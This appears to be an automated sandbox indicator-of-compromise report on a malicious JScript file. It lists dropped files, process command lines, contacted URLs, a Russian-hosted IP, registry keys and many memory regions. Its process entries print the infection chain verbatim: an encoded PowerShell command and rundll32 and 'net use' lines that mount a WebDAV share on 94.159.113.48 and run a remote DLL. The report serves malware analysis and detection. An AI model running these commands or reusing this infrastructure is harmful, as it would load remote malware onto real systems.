IOC Report
212481723992301695.js

loading gif

Files

File Path
Type
Category
Malicious
212481723992301695.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0x7755ad4e, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_et224qok.zih.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbg0jaaa.fyl.psm1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\212481723992301695.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA0ADAAOAAxADgANQAxADAANQAyADQAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\2408185105241.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
http://94.159.113.48:8888/U
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://94.159.113.48:8888/2
unknown
http://94.159.113.48:8888/R
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://aka.ms/pscore68
unknown
http://94.159.113.48:8888/sacef
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://94.159.113.48:8888/
unknown

Domains

Name
IP
Malicious
ax-0001.ax-dc-msedge.net
150.171.29.10

IPs

IP
Domain
Country
Malicious
94.159.113.48
unknown
Russian Federation
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
1D300158000
trusted library allocation
page read and write
1F7C9201000
trusted library allocation
page read and write
EFFF2FD000
stack
page read and write
1F7C887C000
heap
page read and write
1C838529000
heap
page read and write
1C83A23A000
heap
page read and write
1D3752E0000
trusted library allocation
page read and write
EFFF4FC000
stack
page read and write
1D3759B0000
heap
page read and write
EFFEF7E000
stack
page read and write
1D300506000
trusted library allocation
page read and write
7FFD33C40000
trusted library allocation
page read and write
1F7CDE1F000
heap
page read and write
1D3739A0000
heap
page read and write
1C83A203000
heap
page read and write
1C8385B0000
heap
page read and write
1D3739FE000
heap
page read and write
BE0DBFE000
stack
page read and write
FCCC97A000
stack
page read and write
1D30015D000
trusted library allocation
page read and write
1C83A242000
heap
page read and write
1D3752C0000
trusted library allocation
page read and write
7FFD33D20000
trusted library allocation
page read and write
1F7CDDA0000
trusted library allocation
page read and write
1C839D90000
heap
page read and write
7FFD33C60000
trusted library allocation
page read and write
EFFF0FA000
stack
page read and write
1C83A22E000
heap
page read and write
2C50A5EA000
heap
page read and write
1C838531000
heap
page read and write
1D300117000
trusted library allocation
page read and write
1F7C9810000
trusted library section
page readonly
1C83A249000
heap
page read and write
1F7C9BE0000
trusted library allocation
page read and write
7FFD33D10000
trusted library allocation
page read and write
1F7CDEC6000
heap
page read and write
1C83A1FF000
heap
page read and write
1C83A1FF000
heap
page read and write
1C83A34D000
heap
page read and write
1C838548000
heap
page read and write
1C83A2F0000
heap
page read and write
1D373A09000
heap
page read and write
BE0DDFB000
stack
page read and write
1D375A05000
heap
page read and write
2C50DA33000
heap
page read and write
2C50A550000
heap
page read and write
1F7CDDD0000
trusted library allocation
page read and write
1F7CDC71000
trusted library allocation
page read and write
1C83A249000
heap
page read and write
1F7CDF0A000
heap
page read and write
1F7C9100000
heap
page read and write
1F7CDE40000
heap
page read and write
1BE3E8B0000
heap
page read and write
EFFDDFE000
unkown
page readonly
7FFD33D50000
trusted library allocation
page read and write
1F7CDDC0000
trusted library allocation
page read and write
1C83A201000
heap
page read and write
1F7C9102000
heap
page read and write
1C838548000
heap
page read and write
1C838530000
heap
page read and write
1F7C9830000
trusted library section
page readonly
EFFDBFE000
unkown
page readonly
7DF418420000
trusted library allocation
page execute and read and write
EFFEFFE000
unkown
page readonly
1F7C9840000
trusted library section
page readonly
7FFD33AF6000
trusted library allocation
page read and write
1D375280000
heap
page read and write
1F7CDDF0000
remote allocation
page read and write
1C83A2F1000
heap
page read and write
1D3759AE000
heap
page read and write
1C83A249000
heap
page read and write
1C83A1E1000
heap
page read and write
1F7CDF0C000
heap
page read and write
1F7C882A000
heap
page read and write
1D300063000
trusted library allocation
page read and write
1F7C88A0000
heap
page read and write
1C83A1FF000
heap
page read and write
1D373A47000
heap
page read and write
BE0D2F5000
stack
page read and write
EFFE0F9000
stack
page read and write
1F7CDEF7000
heap
page read and write
7FFD33CA0000
trusted library allocation
page read and write
1BE3E936000
heap
page read and write
1F7CDE60000
heap
page read and write
7FFD33B60000
trusted library allocation
page execute and read and write
1F7CDE8F000
heap
page read and write
1D375970000
heap
page read and write
7FFD33A50000
trusted library allocation
page read and write
1F7C888E000
heap
page read and write
1C83A1FF000
heap
page read and write
1F7C87D0000
trusted library section
page read and write
7FFD33CC0000
trusted library allocation
page read and write
1D310001000
trusted library allocation
page read and write
2C50A5F3000
heap
page read and write
1D375450000
heap
page read and write
1C83A226000
heap
page read and write
8B0E27E000
stack
page read and write
7FFD33C70000
trusted library allocation
page read and write
1D3753C6000
heap
page execute and read and write
7FFD33B26000
trusted library allocation
page execute and read and write
848E8FD000
stack
page read and write
1F7C9015000
heap
page read and write
1D3003CE000
trusted library allocation
page read and write
1D373A45000
heap
page read and write
848EDBE000
stack
page read and write
BE0D4FE000
stack
page read and write
1D373A1E000
heap
page read and write
1C838513000
heap
page read and write
1D3003E6000
trusted library allocation
page read and write
EFFE67E000
stack
page read and write
EFFECFE000
unkown
page readonly
1F7C9730000
trusted library allocation
page read and write
1F7C8894000
heap
page read and write
1F7C9113000
heap
page read and write
7FFD33D00000
trusted library allocation
page read and write
2C50A5F3000
heap
page read and write
1C83853E000
heap
page read and write
FCCCC7E000
stack
page read and write
7FFD33C80000
trusted library allocation
page read and write
1F7CDF0E000
heap
page read and write
1D3004AC000
trusted library allocation
page read and write
BE0D6FE000
stack
page read and write
2C50A5E7000
heap
page read and write
1C83A1E6000
heap
page read and write
1C838548000
heap
page read and write
7FFD33C50000
trusted library allocation
page read and write
EFFE4FB000
stack
page read and write
1F7C8800000
heap
page read and write
1C8385BD000
heap
page read and write
8B0DFDE000
stack
page read and write
EFFE1FE000
unkown
page readonly
1C83A1E7000
heap
page read and write
1C83A1E0000
heap
page read and write
1C83852F000
heap
page read and write
1C83A206000
heap
page read and write
7FFD33D60000
trusted library allocation
page read and write
7FFD33CE0000
trusted library allocation
page read and write
1D310073000
trusted library allocation
page read and write
2C50DA30000
heap
page read and write
7FFD33AFC000
trusted library allocation
page execute and read and write
1F7CDE55000
heap
page read and write
1C83A249000
heap
page read and write
2C50A5D0000
heap
page read and write
1C8385B9000
heap
page read and write
1F7CDE8D000
heap
page read and write
1D375960000
heap
page execute and read and write
1F7CDF02000
heap
page read and write
2C50A530000
heap
page read and write
2C50A8CB000
heap
page read and write
1C83A34D000
heap
page read and write
1F7CDD40000
trusted library allocation
page read and write
1F7C8929000
heap
page read and write
1C838548000
heap
page read and write
7FFD33A4D000
trusted library allocation
page execute and read and write
1C83A249000
heap
page read and write
2C50A5EA000
heap
page read and write
1BE3E935000
heap
page read and write
1C83A1E2000
heap
page read and write
848E673000
stack
page read and write
1D300090000
trusted library allocation
page read and write
2C50A5D8000
heap
page read and write
EFFF5FE000
unkown
page readonly
848E97E000
stack
page read and write
1D375A90000
heap
page read and write
1F7C8873000
heap
page read and write
EFFE7FE000
unkown
page readonly
1F7CDBE0000
trusted library allocation
page read and write
1D373890000
heap
page read and write
1D373A00000
heap
page read and write
1D375A3D000
heap
page read and write
1C83A21E000
heap
page read and write
EFFF97E000
stack
page read and write
7FFD33A44000
trusted library allocation
page read and write
848EF3B000
stack
page read and write
1D310011000
trusted library allocation
page read and write
BE0D7FF000
stack
page read and write
1C83A249000
heap
page read and write
EFFEEFE000
unkown
page readonly
1C83A201000
heap
page read and write
1C83A1EB000
heap
page read and write
1F7C86B0000
heap
page read and write
848E87E000
stack
page read and write
EFFEBFE000
unkown
page readonly
1F7CDF0F000
heap
page read and write
1C838548000
heap
page read and write
EFFE77E000
stack
page read and write
7FFD33C10000
trusted library allocation
page execute and read and write
1BE3E8B4000
heap
page read and write
1C83A249000
heap
page read and write
EFFEA7E000
stack
page read and write
1F7CDEB2000
heap
page read and write
1F7C9BB1000
trusted library allocation
page read and write
1BE3E850000
heap
page read and write
848EBB6000
stack
page read and write
1C8384CC000
heap
page read and write
1F7C9000000
heap
page read and write
1F7CDE4D000
heap
page read and write
2C50DA40000
trusted library allocation
page read and write
1C838532000
heap
page read and write
1F7CDC70000
trusted library allocation
page read and write
7FFD33AF0000
trusted library allocation
page read and write
1D3753C0000
heap
page execute and read and write
1F7C88BD000
heap
page read and write
1C83A201000
heap
page read and write
1C83A1E6000
heap
page read and write
1D373A0D000
heap
page read and write
1F7C8890000
heap
page read and write
1F7C8690000
heap
page read and write
848E77E000
stack
page read and write
1F7CDEFB000
heap
page read and write
EFFDEFE000
stack
page read and write
1BE3E908000
heap
page read and write
1F7CDE2C000
heap
page read and write
1BE3E92D000
heap
page read and write
EFFE8FE000
unkown
page readonly
1BE3E939000
heap
page read and write
1F7CDC50000
trusted library allocation
page read and write
1BE3E8D0000
remote allocation
page read and write
1D373A4A000
heap
page read and write
1F7C8902000
heap
page read and write
EFFEAFE000
unkown
page readonly
1D375930000
heap
page execute and read and write
1C83852D000
heap
page read and write
848E7FE000
stack
page read and write
1C83A249000
heap
page read and write
1D375455000
heap
page read and write
1F7C8790000
heap
page read and write
1F7C9850000
trusted library section
page readonly
1D3739A5000
heap
page read and write
1C83A249000
heap
page read and write
EFFDB7E000
stack
page read and write
1C83851B000
heap
page read and write
EFFEB7E000
stack
page read and write
1D375D50000
heap
page read and write
1F7CDED0000
heap
page read and write
1C83A20E000
heap
page read and write
1C838533000
heap
page read and write
1C83A203000
heap
page read and write
2C50A605000
heap
page read and write
EFFDA7E000
stack
page read and write
7FFD33B00000
trusted library allocation
page execute and read and write
7FFD33CD0000
trusted library allocation
page read and write
1C83A203000
heap
page read and write
1C83A229000
heap
page read and write
1BE3E8D0000
remote allocation
page read and write
1BE3E969000
heap
page read and write
1D31000F000
trusted library allocation
page read and write
1C83A229000
heap
page read and write
EFFE3FE000
unkown
page readonly
1F7CDBF0000
trusted library allocation
page read and write
1F7C911A000
heap
page read and write
7FFD33BFA000
trusted library allocation
page read and write
1D375300000
heap
page readonly
1C83A1FB000
heap
page read and write
1BE3E870000
heap
page read and write
1C838534000
heap
page read and write
7FFD33D30000
trusted library allocation
page read and write
1F7C887A000
heap
page read and write
EFFE87E000
stack
page read and write
1C838548000
heap
page read and write
1D30001B000
trusted library allocation
page read and write
BE0DAFE000
stack
page read and write
1BE3E95B000
heap
page read and write
1D300113000
trusted library allocation
page read and write
EFFE5FE000
unkown
page readonly
1D373ABD000
heap
page read and write
EFFD76B000
stack
page read and write
1D373970000
heap
page read and write
1F7CDDF0000
remote allocation
page read and write
1F7C9820000
trusted library section
page readonly
1C83A1E3000
heap
page read and write
1F7CDCB0000
trusted library allocation
page read and write
1F7CDCA0000
trusted library allocation
page read and write
1F7C911A000
heap
page read and write
1F7CF000000
heap
page read and write
1C8384CC000
heap
page read and write
1F7C885B000
heap
page read and write
BE0D9FF000
stack
page read and write
1BE3E96F000
heap
page read and write
1F7CDC90000
trusted library allocation
page read and write
1F7CDC70000
trusted library allocation
page read and write
1F7C8913000
heap
page read and write
EFFEC7E000
stack
page read and write
EFFDFFE000
unkown
page readonly
1F7CDF05000
heap
page read and write
1F7CDDC0000
trusted library allocation
page read and write
EFFDCF7000
stack
page read and write
848EB3E000
stack
page read and write
1F7C9002000
heap
page read and write
2C50A5F4000
heap
page read and write
EFFE97E000
stack
page read and write
848EC38000
stack
page read and write
7FFD33BE0000
trusted library allocation
page read and write
2C50A600000
heap
page read and write
1D375A3A000
heap
page read and write
1F7CDDB0000
trusted library allocation
page read and write
2C50A8C0000
heap
page read and write
7FFD33C30000
trusted library allocation
page execute and read and write
1C83A249000
heap
page read and write
1BE3E900000
heap
page read and write
1F7CDE00000
heap
page read and write
1C838531000
heap
page read and write
848ECBE000
stack
page read and write
EFFE9FE000
unkown
page readonly
7FFD33D40000
trusted library allocation
page read and write
1D373AC0000
heap
page read and write
1F7CDCCE000
trusted library allocation
page read and write
EFFF1FE000
unkown
page readonly
1F7C8840000
heap
page read and write
1C8385BB000
heap
page read and write
1D300538000
trusted library allocation
page read and write
1F7C88FF000
heap
page read and write
848EE3F000
stack
page read and write
1F7CDC60000
trusted library allocation
page read and write
7FFD33C90000
trusted library allocation
page read and write
1F7CDDF0000
remote allocation
page read and write
2C50A520000
heap
page read and write
EFFEDFE000
stack
page read and write
1C83A1E6000
heap
page read and write
1F7CDEEB000
heap
page read and write
1BE3E956000
heap
page read and write
1C83A299000
heap
page read and write
1C8384D8000
heap
page read and write
1C83853D000
heap
page read and write
848ED3E000
stack
page read and write
1C838550000
heap
page read and write
EFFDAFE000
unkown
page readonly
FCCC9FE000
stack
page read and write
1C838430000
heap
page read and write
1C83A229000
heap
page read and write
1D3739D2000
heap
page read and write
EFFE2FC000
stack
page read and write
1F7CDEC8000
heap
page read and write
1F7C8878000
heap
page read and write
EFFE6FE000
unkown
page readonly
7FFD33A43000
trusted library allocation
page execute and read and write
1C838526000
heap
page read and write
7FFD33C00000
trusted library allocation
page execute and read and write
1F7C9860000
trusted library section
page readonly
7FFD33A42000
trusted library allocation
page read and write
7FFD33C22000
trusted library allocation
page read and write
848EEBE000
stack
page read and write
1C838479000
heap
page read and write
EFFF3FE000
unkown
page readonly
1C838350000
heap
page read and write
EFFF9FE000
unkown
page readonly
1C83851E000
heap
page read and write
1D3739C0000
heap
page read and write
1C83A1FF000
heap
page read and write
1D300001000
trusted library allocation
page read and write
1F7CDCA0000
trusted library allocation
page read and write
1C8385BE000
heap
page read and write
1F7C87C0000
trusted library allocation
page read and write
1C83A211000
heap
page read and write
1BE3E8D0000
remote allocation
page read and write
1C8385B9000
heap
page read and write
1C83A203000
heap
page read and write
7FFD33CF0000
trusted library allocation
page read and write
1D375A58000
heap
page read and write
1F7CDE62000
heap
page read and write
1C83A1E5000
heap
page read and write
1BE3E935000
heap
page read and write
1F7CDD50000
trusted library allocation
page read and write
1D300110000
trusted library allocation
page read and write
1F7CDF00000
heap
page read and write
1F7CDD40000
trusted library allocation
page read and write
848E6FE000
stack
page read and write
1C838478000
heap
page read and write
7FFD33CB0000
trusted library allocation
page read and write
1D3752F0000
heap
page read and write
1D300103000
trusted library allocation
page read and write
1F7CDEEF000
heap
page read and write
1F7CDE5B000
heap
page read and write
1F7CDCB4000
trusted library allocation
page read and write
8B0E37E000
stack
page read and write
1C8385B5000
heap
page read and write
1C838450000
heap
page read and write
2C50A8A0000
heap
page read and write
8B0E2FC000
stack
page read and write
1D300023000
trusted library allocation
page read and write
BE0D3FE000
stack
page read and write
848EA7E000
stack
page read and write
1C83851E000
heap
page read and write
BE0D8FF000
stack
page read and write
1F7C9540000
trusted library allocation
page read and write
848EAF9000
stack
page read and write
1C838491000
heap
page read and write
1C838548000
heap
page read and write
2C50A5F3000
heap
page read and write
2C50D910000
heap
page read and write
7FFD33BF1000
trusted library allocation
page read and write
1C8385BD000
heap
page read and write
1BE3E840000
heap
page read and write
8B0DF5B000
stack
page read and write
848E9FE000
stack
page read and write
1C83A1E6000
heap
page read and write
2C50A5EE000
heap
page read and write
1F7C8813000
heap
page read and write
848ECB8000
stack
page read and write
2C50A8C4000
heap
page read and write
1C83A1F3000
heap
page read and write
1D375380000
trusted library allocation
page read and write
There are 392 hidden memdumps, click here to show them.